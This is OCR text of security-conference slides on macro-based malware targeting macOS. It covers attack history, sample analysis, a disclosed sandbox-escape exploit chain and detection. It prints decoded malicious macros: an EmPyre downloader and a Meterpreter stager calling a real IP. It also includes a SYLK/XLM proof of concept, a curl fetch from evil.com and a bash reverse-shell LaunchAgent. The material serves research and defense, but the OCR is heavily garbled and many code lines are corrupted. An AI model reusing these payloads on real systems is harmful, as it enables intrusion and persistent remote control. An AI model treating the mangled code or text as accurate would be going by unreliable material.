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Recent History 
macro based attacks, targeting macOS 


MACROS 


...defined tlidr: add code to documents 


b. Macro: 


"A macro is a series of commands & instructions that you group 


together as a single command to accomplish a task automatically" 
-Microsoft 


η M 


gold Sub AutoOpen() 
+ EI MsgBox "Hello World!", 0, "Title" 
7r End Sub 
VB — - ___ 
" de (VBScript) 
: macro code Cri 
MSOffice document P 
* code 


d 


Title 
==== === mm m > W Hello World! 


25 Microsoft 


MACROS 
...Of course (ab)used by attackers 


b. 
+ 


This document contains macros. Do you want to disable macros 
before opening the file? 


5) The Melissa Virus — FBI X =- 


C a fbi.gov/news/stories/melissa-virus-20th-anniversary-032519 


The Melissa Virus 
An $80 Million Cyber Crime in 1999 Foreshadowed Modern Threats 


Two decades ago, computer viruses—and public awareness of the tricks used to unleash them—were still 
relatively new notions to many Americans. 


One attack would change that in a significant way. 


In late March 1999, a programmer named David Lee Smith hijacked an America Online (AOL) account and used 
it to post a file on an Internet newsgroup named “alt.sex.” The posting promised dozens of free passwords to fee- 
based websites with adult content. When users took the bait, downloading the document and then opening it with 


On March 26, it began spreading like wildfire across the Internet. 


Process Name Sandbox 


[EF Microsoft Word Yes 


Macros may contain viruses that could be harmful to your computer. If 


m [1 m 
this file is from a trusted source, click Enable Macros. If you do not fully th h t t 
trust the source, click Disable Macros. EL RE M » oug mi JL ga L O n S e * e 


Enable Macros Do Not Open Disable Macros 


MACROS 
now on macos? — 
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Cult of Mac 


Apple s share of global computer market grows 
39971 


Apple Must ος pF 
20211 | 


Home Mac &iOS tips  StufftoBuy About 


1146 544 1729 R e 
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Mac adoption at SAP doubles as Apple enterprise reach 


SAMA malicious & potentially unwanted 
o == files for macOS (Kasperksy) 
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la======= ===> more macs... more mac malware... ===mu 


2017 


macro attack 


"U.S. Allies and Rivals Digest 
Trump’s Victory - Carnegie 
Endowment for International 
Peace .docm" 


C Snorre Fagerland id 


Lt 


e 5 @fstenv 

HOSX #Macro #EmPyre "U.S. Allies and Rivals Digest 
Trump's Victory - Carnegie Endowment for International 
Peace" virustotal.com/en/file/07adb8... 


Opening U.S. Allies and Rivals Digest Trump's Victory - Carnegie Endow... | 


This document contains macros. Do you want to 
disable macros before opening the file? 
Ma ontain viruses that could be harmful to your 

is 


cros may c 
computer. If this file is from a trusted source, click Enable Macros. 
If you do not fully trust the source, click Disable Macros. 


12:34 ΑΜ. Feb 6, 2017 - TweetDeck 


Learn about macros E. 
Ga) 
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Disable Macros o” A 
WET i | s gi * " 


able Macros Do Not Open 


v far 
SA total 


SHA256: 07adb8253ccc6fee20940de04c1bf4a54a4455525b2ac33f9c957 13a8a102f3d P WS 


File name: U.S. Allies and Rivals Digest Trump's Victory - Carnegie Endowmen... 
Detection ratio: 4/55 (y 1 (D 0 


Analysis date: 2017-01-16 18:48:58 UTC (3 weeks ago ) 


discovery 6 (limited) 
detection 


"New Attack, Old Tricks" 
objective-see.com/blog/blog 0x17.html 
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2018 


macro attack 


"BitcoinMagazine- 

Quidax InterviewQuestions 2018.docm" 
© v T m po 
This #bitcoin interview lure macro doc does not infect any ae ο 


version of Office for Windows. Why? It is targeting MacOffice. 
When you see libc.dylib, system, and plist, you know the macro V 
is up to no good. p m m m 
m objective-see.com/blo/blog 0x35.... (d'a @patrickwardle) 
m virustotal.com/#/file/4454e76... sand box escape! i 
= 5 engines detected this file i i 
L SHA-256 4454e768b295ed2869f657b2e9f47421b6ca0548e67092735665cd339a41dddb 
DOCX File name BitcoinMagazine-Quidax InterviewQuestions 2018.docm R ai 
File size 22.39 KB 
b Last analy: 2018-12-04 03:50:09 UTC E 
5/59 ) i z 
Lommunity score - i 
Detect L E E 
ClamAV A Legacy.Trojan.Agent-37025 Endgame A malicious (high confidence) m M M M m a E 
Qihoo-360 A virus.office.qexvmc.1085 SentinelOne A static engine - malicious «4 mm W Em EH EH EH UEM MM ΠῈ M Mm 
TACHYON A Suspicious/ WOX.Obfus.Gen.2 Ad-Aware © Clean 


discovery 6 (limited) download 6 exec 
detection 2nd-stage (python) payload 


"Word to Your Mac" 
objective-see.com/blog/blog Ox3A.html 


2019 


macro attack 


A "TE JENSHEN (171/9387 1S . doc" 
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is mac? 
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ZEK 


<> ZES m m m u: I 
infected document URO 


(credit: kaspersky) download 6 exec 
2nd-stage (mach-O) payload 


"Cryptocurrency businesses still being targeted by Lazarus" 
securelist.com/cryptocurrency-businesses-still-being-targeted-by-lazarus 


e 


Analysis 


understanding macro based attacks 


EXTRACTING EMBEDDED MARCOS 


$ sudo pip install -U oletools 


decalage2 / oletools CPUsedby- 93 OQOwatchv 88 wWStar 11k York 273 
<> Code 
$ olevba -c <path/to/document> 
oletools - python tools to analyze MS OLE2 files (Structured Storage, Compound File Binary Format) and MS Office documents, for malware 
analysis, forensics and debugging. http://www.decalage.info/python/oletools 
github.com/decalage2/oletools installation/usage 


$ olevba -c ~/Documents/HelloWorld.docm 
olevba 0.55.1 on Python 3.7.3 - http://decalage.info/python/oletools AutoOpen ( ) 


FILE: /Users/patrick/Documents/HelloWorld.docm (automatically) runs after 


Type: OpenXML 


us un Mudcat ΙΤ you open a new document” 


VBA MACRO ThisDocument.cls 
in file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument' A 


| Sub AutoOpen () 
| MsgBox "Hello World!", 0, "Title" 
| End Sub 


macro extraction 


"Description of behaviors of AutoExec & AutoOpen macros" 


ort.microsoft.com/en-us/help/286310/description-of-behaviors-of-autoexec-and-autoopen-macros-in-word 


su 


ANALYSIS: 


via autoopen 


$ olevba -c "U.S. Allies and Rivals Digest Trump's Victory.docm" A f i 
'Fisher' subroutine: 


automatically executed 


Α 


VBA MACRO ThisDocument.cls 
in file: word/vbaProject.bin 


End Sub | 


Sub 'Fisher()': 
[1] concat base64-encoded str. 


Public Sub Fisher () 


Dim result As Long 
Dim cmd As String 
cmd = "ZFhGcHJ2c2dNQINJeVBmPSdhdGZNelpPcVZMYmNqJwppbXBvcnQgc3" 
cmd = cmd + "NsOwppZiBoYXNhdHRyKHNzbCwgJ19jcmVhdGVfdW52ZXJpZm" 


(2) decode & exec via python 


result = system("echo ""import sys,base64;exec (base64.b64decode( 
Ver " & cmd & " A TWK) RUM | python a") m u m α m μα = 


End Sub v 


Fisher() embedded macros 


ANALYSIS: 


$ python 


>>> import base64 
>>> cmd = "ZEhGcHJ2cZdNQ1NJeVBmPSdhdGZNelpPcVZMYmNqJwppbXBv .... 
>>> base64.b64decode (cmd) 


dXFprvsgMBSIyPf = 'atfMzZOqVLbcj' 
import ssl; 

import sys, urllib2; 

import re, subprocess; 


cmd = "ps -ef | grep LittleN Snitch | grep -v grep" 
ps = subprocess.Popen(cmd, shell = True, stdout = subprocess. PIPE) 
out = ps.stdout.read() 
ps.stdout.close () 
1f re.search("Little Snitch", out): 

sys.exit() 


En ο CZE Ada weta checking. org: 443/index.asp') .read() ; 
'fff96aed07cb7ea65e7f031bd714607d'; 


out = range (296), ο, [] 
L in range(256): 

jJ = (j + S[i] + ord(key[i $ len(key)])) 5 256 
i], 5111 = S[j]l, Sti] 


exec (''.join(out) ) 


decoded python code 
...looks familiar!? 


/> firewall check 
[1] LittleSnitch running? 


(3) Download 2nd-stage payload 


(www.securitychecking.org) 


E RC4 decrypt this payload 
(key: fff96aed07cb7ea...) 


μὴ Execute decrypted payload 


launcherBase += "import re, subprocess;" 
launcherBase += "cmd = \"ps -ef | grep Little\ Snitch | grep -v grep\"\n" 
launcherBase += "ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)Nn" 


launcherBase += "out = ps.stdout.read()\n" 


v 


launcherBase += "ps.stdout.close()\n" 
launcherBase += "if re.search(\"Little Snitch", out):\n" 


launcherBase += "  sys.exit()ln" 


launcherBase += "S,j,out-range(256),0,[]Mn" 
launcherBase += "for i in range(256):\n" 
launcherBase += " j=(j+S[i]+ord(key[i%len(key) ] ) )%256in" 
S[1],S[j]=S[J]„S[1]Nn" 


launcherBase += "i=j=Øln" 


launcherBase += " 


launcherBase += "for char in a:\n" 

i=(i+1)%256\n" 

j=(j+S[1])%256\n" 

5[1],5[]]-55[1]»,5[1]λπ" 
out.append(chr(ord(char)*S[(S[i]+S[j])%256]))4n" 


launcherBase += "exec(''.join(out))" 


launcherBase += " 
launcherBase += " 
launcherBase += " 


launcherBase += " 


EmPyre (python backdoor) 


ANALYSIS: 


$ olevba -c "BitcoinMagazine-Quidax InterviewQuestions 2018.docm" 


'Document Open()': 


Private Sub Document Open () | ! — | πὶ = : : : 
Gers automatic execution 


payload = "import base6Z,sys;exec(base64.b64decode((2:str,3:lambda 


b:bytes (b, 'UTF-8')) [sys.version info[0]] ('aWlwb3J0IHNvY2tldCxzdHJ" & 
"...6c30pCg==')));" 


path = Environ("HOME") & [1] decode 6 exec via python 
"/../../../../Library/LaunchAgents/+$com.xpnsec.plist" 
arg = "<?xml version=""1.0"" encoding=""UTF-8""?>\n" & 


"<!DOCTYPE plist PUBLIC ""-//Apple//DTD PLIST 1.0//EN"" ..."»Mn" & e ου... 
"<plist version=""1.0"">\n" 6 _ i 

"<dict>in" 6 _ Vv 
"<key>Label</key>\n" & _ 

"<string>com. xpnsec.sandbox</string>\n" 6 _ 

"<key>ProgramArguments</key>\n" & _ 

"<array>\n" 6 — 

"<€string>python</string>\n" ἃ _ 

"<€string>-c</string>\n" 6 _ 

"<string>" 6 payload 6 "</string>" 6 _ 

"</array>\n" 6 _ 

"<key>RunAtLoad</key>\n" 6 _ GB) create ~Scom.xpnsec.plist 
"<true/>\n" 6 _ 

"</dict>\n" 6 _ 

"</plist>" 

Result = system("echo """ & arg 6 τ > '" 6 path 6 "'", "r") 
'Result = system("launchctl bootout gui/$UID", "r") 


End Sub 


ANALYSIS: 


i 

i 

i 
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import socket, struct, time 

for x in range(10): 
try: 
s-socket.socket(2,socket.SOCK STREAM) 
s.connect(('109.202.107.20',9622)) 
break 

except: 
time .sleep (5) 


l=struct.unpack('>I',s.recv(4)) [0] 
d=s.recv (l) 

while len(d)<l: 
d+=s.recv(l-len (qd) ) 


exec(d,{'s':s}) 


109.202.107.20 


d==mm 


download & exec 
. ..Meterpreter 


ANALYSIS: 


— = " " path = Environ("HOME") & "/../../../../Library/LaunchAgents/-$com.xpnsec.plist" 
path Environ ( ? HOME ) & - - arg = "<?xml version=""1.0"" encoding=""UTF-8""?>\n" 6 _ 
/ ER / a / Cw / NN /Library/LaunchAgents/-$com.xpnsec .plist "<!DOCTYPE plist PUBLIC ""-//Apple//DTD PLIST 1.0//EN"" ""http://www.apple.com/D' 
1.0.dtd"">\n" & _ 
arg = "<?xml version=" "1 : Q" no >\n" & "<plist version=""1.0"">\n" ἃ _ 


"<dict>\n" & 


"<!DOCTYPE plist PUBLIC ...">\n" & = "<key>Label</key>in" & _ 

"<plist version=""1.0"">\n" & _ E 
" "! "<array>\n" ἃ 
<key>Label</key>\n & = f Er δ _ 
"<string>com.xpnsec.sandbox</string>\n" 6 _ | 


'<string>-c</string>\n" & 


"<string>" 6 payload & "</string>" & _ 


9 ο ο "</array>\n" 6 _ 
"</plist>" τ δ — 
Result = system("echo """ & arg 6 """ > '" 6 path 6 "'", "r") 7 M 
Adam's PoC 
$ codesign --display -v --entitlements - "Microsoft Word.app" 
z | | Ap» allows us to create a file anywhere on the 
com. apple.security.temporary-exception.sbpl B 
(allow—filesraadi_filesurite® | - | filesystem as long as it ends with «$something 
(require-any | 
(require-all (vnode-type REGULAR-FILE) | i -(Adam Chester) 
j i 
i 


. = = = > sandbox escape via 
Word's Sandbox Profile /Library/LaunchAgents/~$com.xpnsec.plist 


"Escaping the Microsoft Office Sandbox" 
oo o” objective-see.com/blog/blog 0x35.html 


ANALYSIS: Ὃ 

"de JENANGAN (0112/9705. doc" 

Ν 'AutoOpen()': 

triggers automatic execution 


m å 
nzssdm.com 


macO5-specific 
logic 


======= embedded (macOS-specific) 


Å 
a 
a 
Å 
E 
i 
mt.dat 
Å 
ly 
E 


E 
: macros i 
i (implant) 
- [1] download payload (via curl) I 
E 
w D» E) set executable (via chmod +x) i 
Em E EM πα μαι μαι πι å 


l 


E execute (via popen) 


"Lazarus APT Targets Mac Users with Poisoned Word Document" 
labs.sentinelone.com/lazarus-apt-targets-mac-users-poisoned-word-document/ 


Advanced Exploitation 


a O-clicK' macro based attack 


CURRENT ATTACKS 
„..rather lame (and dysfunctional?) 


Process Name 
This document contains macros. Do you want to disable macros we M icrosoft Word 
before opening the file? 

Macros may contain viruses that could be harmful to your computer. If 

this file is from a trusted source, click Enable Macros. If you do not fully 

trust the source, click Disable Macros. 


Enable Macros Do Not Open Disable Macros 


'- = = quarantine attribute 
+ notarizations 


"—-————mmmumi 


Sandbox 


Yes 


" can't be opened because Apple 
cannot check it for malicious software. 


This software needs to be updated. Contact the 
developer for more information. 


bitbucket.org 


Show in Finder 


AUTOMATIC MACRO EXECUTION 


...With no alerts αν only Office 20II, Microsoft: żEwontfix 


"In Office 2011 for Mac, XLM Macro's in Sylk files are auto executed 
"Ὁ, (no protected mode or macro prompt)" 


-The MS Office Magic Show" (2018), Pieter Ceelen 6 Stan Hegt 


y no prompt! 


X 


Disable all macros with notification 


Enable all macros (not recommended; potentially dangerous code can run) 


Microsofte Excel for Mac KRK 
Version 16.30 (19101301) ma σ r O S e Cu r 1 ty 
Excel 2019 


ww latest version of Office! 


"The Microsoft Office (2016, 2019) for Mac option "Disable all macros 
/N without notification' enables XLM macros without prompting..." 


-CERT, vulnerability note VU#125336 (11/2019) 


XLM MACROS IN SYLK FILES 
...Ollld file format! 


mac: 4 still supported 
macro language predating VBA | 
ᾶ "LF i 
Sylk (.slk) files —m 
E SYmbolic LinK, (1980s file format) 
ID;P 
O;E 


NN;NAuto open;ER101C1;KOut Flank;F 
C;X1;Y101;K0;ECALL("libc.dylib","system","JC","open -a Calculator") 
C;X1;Y102;K0;EHALT() 

E 


PoC.slk: spawn calc (via XLM) 


a "Abusing the SYLK file format" 
outflank.nl/blog/2019/10/30/abusing-the-sylk-file-format/ 


New Tab 


C © Nttps://file.io/zBBOCw 


Web Store 


Add shortcut 


4 


Gmail 


eee 
Images 999 


# Customize 


ME 


SANDBOX BYPASS 
ΑΦ spawning calc, is now, far from end-game 


Process Name Sandbox eo | Rr Mae mm coos) 


We Microsoft Word Yes © O0 ἃἅν Ge Memory Energy Disk Network Q calc 
—H——— MEE Process Name User Sandbox 


- - - m m m m m m m m m m m m m» W Calculator user Yes 


-1on, child processes created with 
the Process class inherit the sandbox of the parent app" -Apple 


le) "In a sandboxed applicatio 


$ codesign --display -v --entitlements - "Microsoft Word.app" 


TN | | m allows us to create a file anywhere on the 
com.apple.security.temporary-exception.sbpl P | 
(allow file-read* file-write* filesystem as long as it ends with ~$something 
(require-any [TT =" — SP { 
(require-all (vnode-type REGULAR-FILE)| (regex #"(*|/)~\$[*/]+5")) | (Adam Chester) 
) FE ZEE 


) 


Word's (Office) Sandbox Profile 


<string> 
(deny file-write* 


(subpath (string-append (param " HOME") "/Library/Application Scripts")) 
(subpath (string-append (param " HOME") "/Library/LaunchAgents"))) 
</string> 


...now patched 


SANDBOX BYPASS 


escape? 


{ 


sandbox allows: 
Uf network comms 
wy Script execution 


sandboxed 


A process monitor 


# processMonitor 


"event" : "ES EVENT TYPE NOTIFY EXEC", 
"process" : { 
"path" "/usr/bin/curl", 


"arguments" : [ 

"curl" , 

" LI," | 
"http://evil.com/escape.py", 


| "/tmp/~Sescape.py" | 


"event" : "ES EVENT TYPE NOTIFY EXEC", 


"process" : { 
"path" "/System/Library/.../2.7/bin/python2.7", 
"arguments" : [ 
"python", 
"/tmp/~Sescape.py" 
1, 


curl / python...allowed! 


BYPASS 


iser loc 
#create (CF)URL to app (e.g. Terminal.app) 
CoreFoundation.CFURLCreateWithFileSystemPath ( 
kCFAllocatorDefault, path2App.get ref(), 
1) 


= À | r | 
| Å „a 4 | | | B 
O. Eb , dm FG 5] 
Gat) Wie ] C D DD 


v 
à 
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SANDB 


kCFURLPOSIXPathStyle, 
CoreServices.LSSharedFileListCreate ( 


appURL 


kCFAllocatorDefault, 


items 
fadd app to list of login items 
CoreServices.LSSharedFileListInsertItemURL ( 
None, None, appURL, None, None) 


#get the list of (existing) login items 
kLSSharedFileListSessionLoginItems, None) 


loginItems, kLSSharedFileListItemLast, 
E 


~Sescape.py 


# TrueTree 
/System/Library/CoreServices/loginwindow.app 


/System/Applications/Utilities/Terminal.app 


/System/Library/LaunchDaemons/com.apple.loginwindow.plist 


Login Items 


Users & Groups 


Password 


To hide an application when you log in, | ect the checkbox in the Hide 


column next to the application. 


a 


du Login Options 


e Click the 


ock to make changes. 


Sandbox 


Q terminal 


User 


Memory Energy Disk Network 


© © #~ 
un-sandboxed! 


Process Name 


F- | Terminal 


loginwindow -> login items 
(TrueTree, J. Bradley) 


QUARANTINED / NOTARIZATION 


Ap can't pass args to login items | --------- 


— ENTE. persist our own (payload)? 


These items will open automatically when you log in: 


Item Kind 
[-] Terminal Application 


Password Login Items 


These items will open automatically when you log in: 


Item Kind 


F |-$payload Unix executable 


E NN;NAuto open;ER101C1;KOut Flank;F 
ΠΠ m = = WWE C;X1;Y102;KO;ECALL("libc.dylib","system","JC","touch /tmp/\~\Spayload") 


$ xattr ~\Spayload 
com.apple.quarantine 


".„$payload” cannot be opened because it 
is from an unidentified developer. 


$ xattr -p com.apple.quarantine /tmp/~\S$payload 
0086;5e4c4b7a;Microsoft Excel; 


macOS cannot verify that this app is free 


from malware. 


any created payload: com.apple.quarantine 
(can't $ xattr -rc in sandbox) 


ΕἼ blocked :( 


QUARANTINED / NOTARIZATION 
„..an idea 


a launch agent: 9 
' run apple binary 
! Sj Pass arguments! 


Y 


<?xml version="1.0" encoding="UTF-8"?> 
<plist version="1.0"> 
<dict> 
<key>ProgramArguments</key> 
<array> 
<string>/bin/bash</string> 
<string>-c</string> 


<string>/bin/bash -i &gt;&amp; /dev/tcp/<attacker ip>/8080 Oégt; éamp;1</string> 
</array> 


ν 


avoids com.apple.quarantine 


reverse shell, via bash 
sandbox rule 


creating launch agents: disallowed! 


QUARANTINED / NOTARIZATION 
„..an idea 


7 sandbox escape 
M ...apple only, with no args 


Å quarantine 'bypass' 


[M ...but can't create (from sandbox) 


escape 


create launch 
agent 


...must find a way for an apple binary (with no 
arguments), to create a launch agent for us! 


ARCHIVE UTILITY.APP 
...àn idea! a A: macOS invokes its default handler! 
Q: what happens if we | í lapple binary, p the sandbox) 


‘persist’ a. Zip file 2 


Archive Utility.app 


Archive Utility V 


« " Ir © launch agent "created" 
LaunchAgents/ E 


~/Library/~Spayload.zip 


----» foo.plist 


FULL EXPLOIT CHAIN 
"remotely infecting macos 


downloads & "persists" 


user opens .slk file ~$payload.zip 


LaunchAgents/ 
on (next) login, launch 


on (next) login, "Archive agent runs ...reverse shell! 
Utility" invoked & unzips 
...creating launch agent 


FULL EXPLOIT CHAIN 
an 'unsandboxed reverse shell ...game over! 


zplist νέοι, ἄπ Sf runs outside sandbox 


<dict> 


<key>ProgramArguments</key> v can down 1 O ad & 


<array> 
<string>/bin/bash</string> unquarantine files! 
<string>-c</string> 
<string>/bin/bash -i &gt;&amp; /dev/tcp/<attacker ip>/8080 O&gt;&amp;l«/string» 

</array> 


launch agent (reverse shell, via bash) 


: 4 Patrick Wardle 2:05 PM 


$ sw_vers 

ProductName: Mac OS X 
ProductVersion: 10:15 T 
BuildVersion: 19B88 


works on fully patched macOS 10.15.1 too 


Jaron Bradley 2:06 PM 
OSX .WindTail BA) | like how it still says OS X 
waz" „ final payload: 
^v (repurposed) OSX.Wind Tail 
user@users-Mac ~ % ps aux | grep -i Final 


user 1759 0.0 0.6 4848980 12476 ?? S 4:11PM 0:00.09 /Users/user/Library/Final. Presentation.app/Contents/MacOS/usrnode 
user 1755 0.0 0.5 4842364 10684 ?? S 4:11PM 0:00.06 /private/tmp/Final Presentation.app/Contents/MacOS/usrnode 


ahhhhh so ii dope 


il going to see if | can install some repurposed malware (unsigned & unnotarized) 
«4 κα mm m m m 


Defense 


protection against macro based attacks 


FIXES & BUG REPORTS 
„..Microsoft & Apple 


Security Update Guide » Details 


————— CVE-2019-1457 (Microsoft Office Excel Security Feature Bypass) 
Security Vulnerability 


macro bug 
patched: CVE-2019-1457 


MSRC Case 54864 CRM:0461129770 


Microsoft Office (macOS) Sandbox Escape + Bypassing Catalina's File Quarantine and Code Notarizations 


$ 


Patrick Wardle 
Fri 11/8/2019 9:22 AM 


product-security@apple.com; Y 


[par writeup MICROSOFT.pdf [par] writeup APPLE.pdf 
me 255KB mE 239KB 


2 attachments (494 KB) Download all Save all to OneDrive - Jamf 


Aloha, 


Reporting a full exploit chain l've created that remotely installs a persistent unsigned macOS backdoor on Catalina (10.15.1) 


full report to Apple 
»2$ patched: 10.15.3 


u, ‘ 
l d Microsoft Security Response Center <secure@microsoft.com> = sa known ISSUE 
Microsoft Office (macOS) Sandbox Escape ΕΙ Tue 11/19/2019 1:16 PM aw 
marcam > Microsoft Security Response Center <secure@microsoft.com>; Patrick Wardle Y ET A À d b l? 
Patrick Wardle | On the pple SI Ć R 
E zoo osz E Hi Security Researcher, | 
7 


secure@microsoft.com; Josh Stein Y Å 
Q mm Ἢ m 


par writeup MICROSOFT.pdf 
WEN 255KB 


Aloha, 


I've uncovered a sandbox escape affecting the latest versions of Microsoft Office on macOS. 


Thank you for your submission. We determined! your finding is valid but is a known issue on the Apple side. 


| 


25 Microsoft 


DETECTION 


# ./processMonitor 


{ 
"event" : "ES EVENT TYPE NOTIFY EXEC", 


"path" : "/Applications/Microsoft Excel .app m E 
|"pid" s. 1406 u z |] i 
| = =>" | UOS à mm mmm mmm => 
curl 


"event" : "ES EVENT TYPE NOTIFY EXEC", 
"process" : ( I 

"path" : "/usr/bin/curl", 

"arguments" : [ E 
"curl", A 
"http://evil.com/escape.py", | 
"ao" 

å Β 

"/tmp/-$escape.py" u m mm = >> 4 = 
: 1406 Τα μα μαι μα πα πα πα πα μα πα μα μα NM μα μα H python 


| 
| 


| 


"event" : "ES EVENT TYPE NOTIFY EXEC", 
"process" : { 
"path" : "/System/Library/.../2.7/bin/python2.7", 
"arguments" : [ 
"python", 
"/tmp/~Sescape.py" 


Y 
I 
i 


| "ppid" : 1406 ᾱ--------------- 


suspicious childreni 


Excel (pid: 1406) spawning curl & python!? 


DETECTION 


# ./fileMonitor 

{ 
"event" : "ES ΕΝΕΝΤ ΤΥΡΕ NOTIFY WRITE", 
"file" : { 


"destination" : "~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm", 
"path" : "/System/Library/CoreServices/backgroundtaskmanagementagent", 
) 

) 


login item persistence (backgrounditems.btm) 


Ίσα τα τα τα τα τα το τα τα 
These items will open automatically when you log in: B 
Item Kind I 
| là ~$payload.zip ZIP archive 


non-app login item! 2 


suspicious persistence! 


"Block Blocking Login Items" 
objective-see.com/blog/blog 0x31.html 


GENERICALLY DETECTING MAC MALWARE 
via JamfProtect (MonitorKit + Apple s game engine) 


A CLEVER TOOL USES APPLE'S VIDEOGAME LOGIC 
ENGINE TO PROTECT MACS 


» cnaconr 


..in the news 


gp 
gp 


alert | 


actions 
(alert, log, etc) Apple's game (logic) engine 


Conclusion 


TAKE AWAYS 


m m- m m m m m m m m m m m m m m m m m » 
macro attacks 
...targeting macOS users Usf 


Xp defense in depth! 


Ensure your macOS systems are protected 
by a behavior-based security tool! 


Friends of Ob jective-See” 


A 


Ba: aire 
A jami Sø: 


Guardian 
Mobile Firewall 


Verify, Sø” 5. HALO 


iVerify Digital Guardian Sophos Halo Privacy 


PATRICK . WARDLE( JAMF . COM 


SecureMac SmugMug 


Announcing: 


free (online) books 


== volume 0x1: Analysis 


'-> sA infection vectors 


-> 2 | methods of persistence 
p 


-> Ly analysis tools & techniques 


"THE ART OF MAC MALWARE" 


Pm 


author: p. wardle 


visit: 
https://taomm.org 
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* "Lazarus APT Targets Mac Users With Poisoned Word Document! -Phil Stokes 


